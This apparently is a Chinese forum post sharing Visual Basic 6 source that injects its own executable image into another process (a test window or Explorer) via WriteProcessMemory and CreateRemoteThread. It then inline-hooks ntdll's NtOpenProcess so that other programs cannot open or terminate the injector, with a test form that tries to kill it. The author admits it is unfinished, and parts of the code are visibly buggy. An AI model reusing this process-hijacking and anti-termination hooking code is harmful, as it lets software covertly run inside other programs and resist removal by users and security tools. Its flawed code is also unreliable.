这篇程序让你实现VB HOOK 的实现,也让你做一些VC等其他语言才能做的事情.不过目前还不是很完善还有待修改,目前还只能注入到EXPLORER.EXE和VB写的程序中.什么原因目前还不知道.由于我不懂汇编,而且目前还在出差就没有多的时间来研究,这个问题就等高手来解决好造福广大VB爱好者吧!
modHookInfo 模块 核心HOOK模块注意这个程序中不能使用类
Attribute VB_Name = "modHookInfo"
Private Declare Function MessageBoxA Lib "user32" (ByVal hwnd As Long, ByVal lpText As String, ByVal lpCaption As String, ByVal wType As Long) As Long
Private Declare Function MessageBoxW Lib "user32" (ByVal hwnd As Long, ByVal lpText As String, ByVal lpCaption As String, ByVal wType As Long) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Const PROCESS_QUERY_INFORMATION As Long = (&H400)
Private Const STANDARD_RIGHTS_REQUIRED As Long = &HF0000
Private Const SYNCHRONIZE As Long = &H100000
Private Const PROCESS_ALL_ACCESS As Long = (STANDARD_RIGHTS_REQUIRED Or SYNCHRONIZE Or &HFFF)
Private mbytOldCode(5) As Byte
Private mbytNewCode(5) As Byte
Private mlngFunAddr As Long
Private mhProcess As Long
Public Function HookApi(ByVal strDllName As String, ByVal strFunName As String, ByVal lngFunAddr As Long, ByVal hProcess As Long) As Boolean
Dim hModule As Long, dwJmpAddr As Long
mhProcess = hProcess
hModule = LoadLibrary(strDllName)
If hModule = 0 Then
HookApi = False
Exit Function
End If
mlngFunAddr = GetProcAddress(hModule, strFunName)
If mlngFunAddr = 0 Then
HookApi = False
Exit Function
End If
CopyMemory mbytOldCode(0), ByVal mlngFunAddr, 6
Debug.Print mbytOldCode(0); mbytOldCode(1); mbytOldCode(2); mbytOldCode(3); mbytOldCode(4)
mbytNewCode(0) = &HE9
dwJmpAddr = lngFunAddr - mlngFunAddr - 5
CopyMemory mbytNewCode(1), dwJmpAddr, 4
Debug.Print mbytNewCode(0); mbytNewCode(1); mbytNewCode(2); mbytNewCode(3); mbytNewCode(4)
HookStatus True
HookApi = True
End Function
Public Function HookStatus(ByVal blnIsHook As Boolean) As Boolean
If blnIsHook Then
If WriteProcessMemory(mhProcess, ByVal mlngFunAddr, mbytNewCode(0), 5, 0) <> 0 Then HookStatus = False '拦截
Else
If WriteProcessMemory(mhProcess, ByVal mlngFunAddr, mbytOldCode(0), 5, 0) <> 0 Then HookStatus = False '恢复
End If
End Function
Private Sub Class_Initialize()
' mhProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, GetCurrentProcessId)
End Sub
Private Sub Class_Terminate()
HookStatus False
' CloseHandle mhProcess
End Sub
Attribute VB_Name = "modHookMain"
Option Explicit
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwnSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function VirtualFreeEx Lib "kernel32" (ByVal hProcess As Long, lpAddress As Any, ByVal dwnSize As Long, ByVal dwFreeType As Long) As Long
Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As Long
Private Declare Function GetProcAddress Lib "kernel32" (ByVal hhMod As Long, ByVal lpProcName As String) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As Any, ByVal lpWindowName As Any) As Long
Private Declare Function CreateRemoteThread Lib "kernel32" (ByVal hProcess As Long, lpThreadAttributes As Long, ByVal dwStacknSize As Long, lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long, lpthreadid As Long) As Long
Private Declare Function GetModuleHandleA Lib "kernel32" (ByVal ModName As Any) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nnSize As Long, lpNumberOflngBytesWritten As Long) As Long
Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nnSize As Long, lpNumberOflngBytesWritten As Long) As Long
Private Declare Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hwnd As Long, ByVal Msg As Any, ByVal wParam As Any, ByVal lParam As Any) As Long
Private Declare Function MessageBox Lib "user32" Alias "MessageBoxA" (ByVal hwnd As Long, ByVal lpText As String, ByVal lpCaption As String, ByVal wType As Long) As Long
Private Declare Function DeleteFile Lib "kernel32" Alias "DeleteFileA" (ByVal lpFileName As String) As Long
Private Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hhMod As Integer, ByVal lpFileName As String, ByVal nnSize As Integer) As Integer
Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long
Private Declare Sub ExitProcess Lib "kernel32" (ByVal dwExitCode As Long)
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
Private Const MEM_COMMIT = &H1000
Private Const MEM_RESERVE = &H2000
Private Const MEM_RELEASE = &H8000
Private Const PAGE_EXECUTE_READWRITE = &H40&
Private Const IMAGE_NUMBEROF_DIRECTIRY_ENRIES = 16
Private Const STANDARD_RIGHTS_REQUIRED = &HF0000
Private Const SYNCHRONIZE = &H100000
Private Const PROCESS_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED Or SYNCHRONIZE Or &HFFF)
Private Type IMAGE_DATA_DIRECTORY
VirtualAddress As Long
Size As Long
End Type
Private Type IMAGE_FILE_HEADER
Machine As Integer
NumberOfSections As Integer
TimeDataStamp As Long
PointerToSymbolTable As Long
NumberOfSymbols As Long
SizeOfOptionalHeader As Integer
Characteristics As Integer
End Type
Private Type IMAGE_OPTIONAL_HEADER32
Magic As Integer
MajorLinkerVersion As Byte
MinorLinkerVersion As Byte
SizeOfCode As Long
SizeOfInitalizedData As Long
SizeOfUninitalizedData As Long
AddressOfEntryPoint As Long
BaseOfCode As Long
BaseOfData As Long
ImageBase As Long
SectionAlignment As Long
FileAlignment As Long
MajorOperatingSystemVersion As Integer
MinorOperatingSystemVersion As Integer
MajorImageVersion As Integer
MinorImageVersion As Integer
MajorSubsystemVersion As Integer
MinorSubsystemVersion As Integer
Reserved1 As Long
SizeOfImage As Long
SizeOfHeaders As Long
CheckSum As Long
Subsystem As Integer
DllCharacteristics As Integer
nSizeOfStackReserve As Long
SizeOfStackCommit As Long
SizeOfHeapReserve As Long
SizeOfHeapCommit As Long
LoaerFlags As Long
NumberOfRvaAndnSizes As Long
DataDirectory(IMAGE_NUMBEROF_DIRECTIRY_ENRIES - 1) As IMAGE_DATA_DIRECTORY
End Type
Private Type IMAGE_DOS_HEADER
e_magic As Integer
e_cblp As Integer
e_cp As Integer
e_crlc As Integer
e_cparhdr As Integer
e_minalloc As Integer
e_maxalloc As Integer
e_ss As Integer
e_sp As Integer
e_csum As Integer
e_ip As Integer
e_cs As Integer
e_lfarlc As Integer
e_onvo As Integer
e_res(3) As Integer
e_oemid As Integer
e_oeminfo As Integer
e_res2(9) As Integer
e_lfanew As Long
End Type
Private Const szTarget As String = "ProgMan"
Private szFileName As String * 261
Private Type OBJECT_ATTRIBUTES
Length As Long
RootDirectory As Long
ObjectName As Long
Attributes As Long
SecurityDescriptor As Long
SecurityQualityOfService As Long
End Type
Private Type CLIENT_ID
UniqueProcess As Long
UniqueThread As Long
End Type
Private Declare Function NtOpenProcess Lib "NTDLL.DLL" (ByRef hProcess As Long, ByVal AccessMask As Long, ByRef ObjectAttributes As OBJECT_ATTRIBUTES, ByRef CliendwThreadId As CLIENT_ID) As Long
Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function lstrcpyn Lib "kernel32" Alias "lstrcpynA" (ByVal lpString1 As String, ByVal lpString2 As String, ByVal iMaxLength As Long) As Long
Private mProcess As Long
Private mlnghWnd As Long
Private mdwProcessId As Long
Private Type MYTYPE
strName As String * 260
hwnd As Long
dwProcessId As Long
End Type
Private pInfo As MYTYPE
Private Sub Main()
' Sub that will start when the program is run
Dim dwProcessId As Long, hProcess As Long
Dim nSize As Long, lngBytesWritten As Long, dwThreadId As Long, hMod As Long, hNewMod As Long
Dim objPImageOptionalHeader As IMAGE_OPTIONAL_HEADER32, objPImageDosHeader As IMAGE_DOS_HEADER, objTImageFileHeader As IMAGE_FILE_HEADER
Dim lngExeVariable As Long
frmMain.Show
' Get the EXE name
GetModuleFileName 0, szFileName, 261
pInfo.hwnd = frmMain.hwnd
pInfo.strName = szFileName
pInfo.dwProcessId = GetCurrentProcessId
' Get the dwProcessId of the program. Note that it must be running in memory (open it)
GetWindowThreadProcessId FindWindow(0&, "测试程序"), dwProcessId
'GetWindowThreadProcessId FindWindow(szTarget, 0&), dwProcessId
' Open the process and give us full access, we need this to hijack it
hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, dwProcessId)
If hProcess = 0 Then End
' Get the memory location of where our code starts in memory, this will correspond to the /BASE: switch that you put in the linker options using compile controller
hMod = GetModuleHandleA(vbNullString)
If hMod = 0 Then End
' Load the code's header into the DosHeader Type
CopyMemory objPImageDosHeader, ByVal hMod, Len(objPImageDosHeader)
' e_lfanew is the starting address of the PE Header in memory. Add this value to the length of the fileheader as well as to the length of the optional header
' These headers are the founding blocks of any executable file, wether in memory or on disk.
CopyMemory objPImageOptionalHeader, ByVal (hMod + objPImageDosHeader.e_lfanew + 4 + Len(objTImageFileHeader)), Len(objPImageOptionalHeader)
' After adding all those lengths, we will get the final nSize of the executable in memory, this is usually a bit more then the nSize on disk
nSize = objPImageOptionalHeader.SizeOfImage
If nSize = 0 Then End
' Just to make sure, free the memory in the program at the location of our exe
VirtualFreeEx hProcess, hMod, 0, MEM_RELEASE
' Allocate the nSize of our exe in memory of the program, at the location of where our exe is in memory
hNewMod = VirtualAllocEx(hProcess, hMod, nSize, MEM_RESERVE Or MEM_COMMIT, PAGE_EXECUTE_READWRITE)
If hNewMod = 0 Then End
' Copy our exe into program's memory
If WriteProcessMemory(hProcess, ByVal hNewMod, ByVal hMod, nSize, lngBytesWritten) = 0 Then End
' Copy the EXE name
lngExeVariable = VirtualAllocEx(hProcess, 0, Len(pInfo), MEM_RESERVE Or MEM_COMMIT, PAGE_EXECUTE_READWRITE)
'lngExeVariable = VirtualAllocEx(hProcess, 0, 261, MEM_RESERVE Or MEM_COMMIT, PAGE_EXECUTE_READWRITE)
If lngExeVariable = 0 Then End
If WriteProcessMemory(hProcess, ByVal lngExeVariable, pInfo, Len(pInfo), lngBytesWritten) = 0 Then End
'If WriteProcessMemory(hProcess, ByVal lngExeVariable, szFileName, 261, lngBytesWritten) = 0 Then End
'*************************************************************************
''这里要做下判断如果是注入非VB程序得拷贝VB库如果是VB程序则不需要下面代码
' Copy VB Runtime to EXE memory (same code as to copy our EXE, so I won't comment it again.
' Dim hVBMod As Long, lngVBnSize As Long, hVBNewMod As Long
' hVBMod = GetModuleHandleA("msvbvm60.dll")
' If hVBMod = 0 Then End
' CopyMemory objPImageDosHeader, ByVal hVBMod, Len(objPImageDosHeader)
' CopyMemory objPImageOptionalHeader, ByVal (hVBMod + objPImageDosHeader.e_lfanew + 4 + Len(objTImageFileHeader)), Len(objPImageOptionalHeader)
' lngVBnSize = objPImageOptionalHeader.SizeOfImage
' hVBNewMod = VirtualAllocEx(hProcess, hVBMod, lngVBnSize, MEM_RESERVE Or MEM_COMMIT, PAGE_EXECUTE_READWRITE)
' If hVBNewMod = 0 Then End
' If WriteProcessMemory(hProcess, ByVal hVBNewMod, ByVal hVBMod, lngVBnSize, lngBytesWritten) = 0 Then End
'**************************************************************************
' Create our remote thread
If CreateRemoteThread(hProcess, ByVal 0, 0, ByVal GetFunAddr(AddressOf RemoteFunAdd), ByVal lngExeVariable, 0, dwThreadId) = 0 Then End
'ExitProcess 0
End Sub
Public Function GetFunAddr(ByVal lngEntrypoint As Long) As Long
GetFunAddr = lngEntrypoint
End Function
Public Function RemoteFunAdd(ByVal hAddr As Long) As Long ' Code that will run in the hijacked program - CANNOT USE MOST VB INTRISTIC FUNCTIONS -
' Call our hMod with full access to VB functions, any other code here needs to be extremly basic (not even left/mid etc)
HookMain hAddr
End Function
Private Function HookMain(ByVal lngAgs As Long) As Long
Dim szExename As String * 261, lnglngBytesWritten As Long
'ReadProcessMemory OpenProcess(PROCESS_ALL_ACCESS, 0, GetCurrentProcessId), ByVal lngAgs, ByVal szExename, 261, ByVal lnglngBytesWritten
'MessageBox 0, "成功HOOK", szExename, 0
Dim mInfo As MYTYPE, nSize As Long
CopyMemory mInfo, ByVal lngAgs, Len(mInfo)
nSize = lstrlen(mInfo.strName)
If nSize <> 0 Then
nSize = nSize + 1
Call lstrcpyn(szExename, mInfo.strName, nSize)
Else
szExename = mInfo.strName
End If
mdwProcessId = mInfo.dwProcessId
' MessageBox 0, mInfo.hWnd, szExename, 0
mProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, GetCurrentProcessId)
' GetWindowThreadProcessId mInfo.hWnd, mdwProcessId
MessageBox 0, szExename, mInfo.dwProcessId, 0
HookApi "ntdll", "NtOpenProcess", GetFunAddr(AddressOf NtOpenProcessCallback), mProcess
End Function
Private Function NtOpenProcessCallback(ByRef hProcess As Long, ByVal AccessMask As Long, ByRef ObjectAttributes As OBJECT_ATTRIBUTES, ByRef ClientId As CLIENT_ID) As Long
Dim lngReturn As Long
HookStatus False
lngReturn = NtOpenProcess(hProcess, AccessMask, ObjectAttributes, ClientId)
HookStatus True
If hProcess <> 0 Then
If ClientId.UniqueProcess >= mdwProcessId And ClientId.UniqueProcess < mdwProcessId + 4 Then
MessageBox 0, "被拦截了", "哈哈", 0
hProcess = 0
End If
End If
NtOpenProcessCallback = lngReturn
End Function
测试程序源码
VERSION 5.00
Begin VB.Form frmMain
Caption = "测试程序"
ClientHeight = 3090
ClientLeft = 60
ClientTop = 450
ClientWidth = 4680
LinkTopic = "Form1"
ScaleHeight = 3090
ScaleWidth = 4680
StartUpPosition = 3 '窗口缺省
Begin VB.CommandButton cmdKill
Caption = "结束进程"
Height = 525
Left = 1080
TabIndex = 0
Top = 1260
Width = 1695
End
End
Attribute VB_Name = "frmMain"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hWnd As Long, lpdwProcessId As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Sub cmdKill_Click()
Dim hWnd As Long, dwProcesdId As Long, hProcess As Long
hWnd = FindWindow(vbNullString, "API拦截")
GetWindowThreadProcessId hWnd, dwProcessId
hProcess = OpenProcess(1, 0, dwProcessId)
TerminateProcess hProcess, 0
End Sub